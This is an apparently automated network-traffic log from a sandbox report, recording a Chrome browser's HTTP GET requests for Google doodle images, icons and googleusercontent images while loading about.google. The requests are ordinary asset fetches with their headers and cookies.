    Source: global trafficHTTP traffic detected: GET /logos/2011/holi11-hp.jpg HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: about.googleConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/?hl=en-USAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga_YGRLMNPG7B=GS1.1.1679378274.1.0.1679378274.0.0.0; _ga=GA1.2.2144369805.1679378274
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2022/nowruz-2022-6753651837109194.2-2x.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /assets-main/img/glue-icons.svg HTTP/1.1Host: about.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga_YGRLMNPG7B=GS1.1.1679378274.1.0.1679378274.0.0.0; _ga=GA1.2.2144369805.1679378274
    Source: global trafficHTTP traffic detected: GET /-tJ0exa-sFRDGwxCfFtT3kaKnhcmHAvtjqHDP41VZhmjMHrNxR7jTkuXxHlonYHF-0oB9I62PsCqlLDA2P8bGcuVdx2yoV5n02Luyqj5E_Sn1kPHeg=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2021/tunisia-national-day-2021-6753651837108892-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2023/tunisia-national-day-2023-6753651837109852-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /LOrhe71Tt-bTc3xdZDG8fwvwhs8qF0ygHRj9DjbcQpP6WWkHFwd8Kca9FbMjZ_y8GVAVlmDhEYlkQxQCVnvCstsYzS_ahoD4SPjUYQo8T3aO3ifLzi8=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /XH1nTzt31w0D2Mh0RIwO57SRWR9xEGnCj9PIt7H6OIWfZJNhuCQTrBJWbzzcr5x1NrYFu2Tshk-YURNywcKeUbL7Syamsfqb1ZAh9MTTnQVKJavTNHIy=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jptdNkprZQo-Qp7UYK4_eMxLzzXWgTIJsIKCVg2Um9jDxtiu0FAPqLkTXl5ZQvgfHNaZliSPsrrtY6tXAB7tb-gwsF9-vs_natxpaLNVCw=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jcu0uhAhK_fAiuPSrVmgIQxcwSxkTkHtGP4XRFhnh497_XGtN_KEA_0eCFdxXHxkMfWUk9uXhMkQBd_GImeJd7Tna6dRuRTTYpFCPSpzJ9Lhpp0egzQ=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /4OMr0tkN-puVthzh9N6e028DIaYljPtm3HD-WZXJ7i1PijG206V92KtvEIUytIinK9qAhGQPWxlt80Sx8mtoT_XrLrfBwJPlQVRn7Vxnv7hGFPJ8wZ1t=w1440-l90-sg-rj-c0xffffff HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2022/tunisia-national-day-2022-6753651837109600-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /MUNO7NmgAs09RF0_Q4omjTtH7Fv6N6CpsLWNeZUIekGIwpadAooelENCI4enC02_j7yRtxhs5sUZaoGJ67dmrYie4nGDHHHQYF1poqHqNQ=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /WsTh371vqLlKjqDM-BIB6lrZvkq6LeGcGgZA-Gdh57kK2G8Tt9EY3gFCQ5SRm-Wl9HrdAE83S-LH2uLsl4c1tEmqccdISKm7DzG4VOihfg=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2021/nowruz-2021-6753651837108889-2x.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2021/spring-2021-northern-hemisphere-6753651837108891-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2021/david-warrens-95th-birthday-6753651837108320-2x.jpg HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: about.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.2074760332.1679378274; _gat_UA-69658807-1=1; _gat_UA-69658807-2=1; _ga_YGRLMNPG7B=GS1.1.1679378274.1.0.1679378274.0.0.0; _ga=GA1.2.2144369805.1679378274
    Source: global trafficHTTP traffic detected: GET /hyqlKj6FYj8yAzPaJZB7cfknhp-7J4SY9rv3NRrQi7ox0HJiZKzUyqKGg6x7xXGmAO_ALYY2Ud--hoKC0sKY51sDCTu6yOMz-3TkpmQ=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2020/tunisia-national-day-2020-6753651837108322-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2023/sapardi-djoko-damonos-83rd-birthday-6753651837110031-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /Bo4-9K6wiEyWZr1x4IfvOeB_NFv8MGC8kqmS--hCUaR0B0puSgikWbDppKEeYSd2bxdhPT9wfcSPdX35aIjShic_UaI8AnK9kUrE1ZVWlg=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /2qXSisrJyDKIya5ouYiCtVAEdZdM2HfTjduDaAVsk-v_SeZtoIZnu79Ol1xz14NfzU2xqV0PIX13I_sx5GQ4gdGyIsKhsgMazdk-2tQ=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2021/fall-2021-southern-hemisphere-6753651837108888-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2020/recognizing-ignaz-semmelweis-and-handwashing-6753651837108746.2-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2019/netherlands-elections-2019-5158774833676288-2x.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2019/nowruz-2019-6284808622702592-2x.jpg HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4; OGPC=1151720448-1:
    Source: global trafficHTTP traffic detected: GET /effFMzq4XvfrZPK0E_tvDivy7b-Kd2-Cmd8TvA-maCZK35whczbTdegzCTQBeA46bhHMIy0Eujntwy2v9vqSBDu-_nT-8eZJerDmkwpV=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /hXMSnnnK17inbOjeyLqFBx3HrKFKdAJlO0cuhNdwe3Yz0O4axkn9ULNFcaEi_zbL_oKUs3VvZM6sAVUB_-gwzDrLwN-ahxnefG0IYhA=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /olVhV9gmfm07h0ru15ZgIm_kj58lRl3-RqqhYS1pqIEmSscfm8zYw5jxXWF9D4VSXBvVj5SBgeq_ohAvAl5d7UvUYMBvynL_3s50N_4mKg=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
